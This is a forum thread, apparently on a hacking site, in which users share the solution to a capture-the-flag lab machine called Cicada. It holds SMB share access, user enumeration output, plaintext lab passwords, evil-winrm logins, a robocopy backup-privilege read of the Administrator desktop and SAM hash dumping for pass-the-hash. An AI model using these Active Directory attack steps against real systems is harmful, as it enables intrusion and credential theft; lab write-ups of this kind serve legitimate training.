Posts: 46
Threads: 0
Joined: Sep 2024
it was one of the easiest box This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 69
Threads: 0
Joined: Aug 2024
someone got root in 3min 33sec tell me how that can be done please This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 46
Threads: 0
Joined: Sep 2024
you can dump sam and system with emily and then pash the admin hash with evil-winrm ... you gonna find root.txt in the desktop
ofc you can crack the password if you want but you don't need to This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 69
Threads: 0
Joined: Aug 2024
and you can do that in 3 min This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 110
Threads: 8
Joined: Aug 2024
(Sep 28, 2024, 08:48 PM)sedlyf Wrote: Easy User and Root
User :
`evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' `
Root :
`robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B`
`type C:\Users\Public\root.txt`
thank you dude, thats help me a lot
Posts: 37
Threads: 1
Joined: Jul 2023
Sep 29, 2024, 07:20 AM
(This post was last modified: Sep 29, 2024, 07:23 AM by 4ip0k.)
(Sep 28, 2024, 07:21 PM)wtfduw Wrote: You can find an open SMB share: smbclient \\\\IP_ADDRESS\\DEV -N
And inside of it you'll find an HR note with a password: Cicada$M6Corpb*@Lp#nZp!8
There's another share named DEV with access denied
can you tell me why when I try to enter the command dir or ls I get an error:
smb: \> dir
NT_STATUS_ACCESS_DENIED listing \*
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
P.S. That's it, I figured it out
Posts: 41
Threads: 2
Joined: Sep 2023
(Sep 29, 2024, 04:50 AM)Mas_PangaREP Wrote: (Sep 28, 2024, 08:48 PM)sedlyf Wrote: Easy User and Root
User :
`evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' `
Root :
`robocopy C:\Users\Administrator\Desktop C:\Users\Public root.txt /B`
`type C:\Users\Public\root.txt`
thank you dude, thats help me a lot
do it right way via sam, security and system to get interactive shell
Posts: 2
Threads: 0
Joined: Apr 2024
Sep 29, 2024, 10:10 AM
(This post was last modified: Sep 29, 2024, 10:30 AM by Synntek0xe9.)
How did you guys got access to david.orelious? I saw password for emily is there.
Want to improve, thanks in advance
[Edit]
Ok i found it. It's ldapdomaindump ldap://10.10.11.35 -u 'cicada.htb\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8'
which was at the beggining of the thread
I tried windapsearch.py, bloodhound-python, and ldapsearch but couldn't make any of this work. Thanks for new tool
[Edit]
It was in the bloodhound. I missed it.
Posts: 69
Threads: 0
Joined: Aug 2024
(Sep 28, 2024, 08:23 PM)Detector6 Wrote: (Sep 28, 2024, 08:04 PM)notluken Wrote: (Sep 28, 2024, 07:41 PM)grieving7 Wrote: (Sep 28, 2024, 07:31 PM)hackemall Wrote: kerbrute Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop
2024/09/28 14:25:50 > Using KDC(s):
2024/09/28 14:25:50 > 10.10.11.35:88
2024/09/28 14:25:51 > [+] VALID USERNAME: michael.wrightson@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: sarah.dantelia@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: john.smoulder@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: emily.oscars@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: david.orelious@cicada.htb
2024/09/28 14:25:51 > Done! Tested 5 usernames (5 valid) in 0.073 seconds
Which command did you run?
kerbrute userenum --dc <IP> -d cicada.htb <PATH-TO-WORDLIST>
that doesn't explain the wordlist. orelious is not a common surname
I used crackmapexec --rid-brute flag This forum account is currently banned. Ban Length: Permanent (N/A Remaining) Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 7
Threads: 0
Joined: Aug 2024
Sep 29, 2024, 03:54 PM
(This post was last modified: Sep 29, 2024, 03:55 PM by kirikiri.)
(Sep 28, 2024, 07:31 PM)hackemall Wrote: kerbrute Version: v1.0.3 (9dad6e1) - 09/28/24 - Ronnie Flathers @ropnop
2024/09/28 14:25:50 > Using KDC(s):
2024/09/28 14:25:50 > 10.10.11.35:88
2024/09/28 14:25:51 > [+] VALID USERNAME: michael.wrightson@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: sarah.dantelia@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: john.smoulder@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: emily.oscars@cicada.htb
2024/09/28 14:25:51 > [+] VALID USERNAME: david.orelious@cicada.htb
2024/09/28 14:25:51 > Done! Tested 5 usernames (5 valid) in 0.073 seconds
Hello sr, I can ask you if you know where I can find a good list of firstName.lastName or last name words to generate
|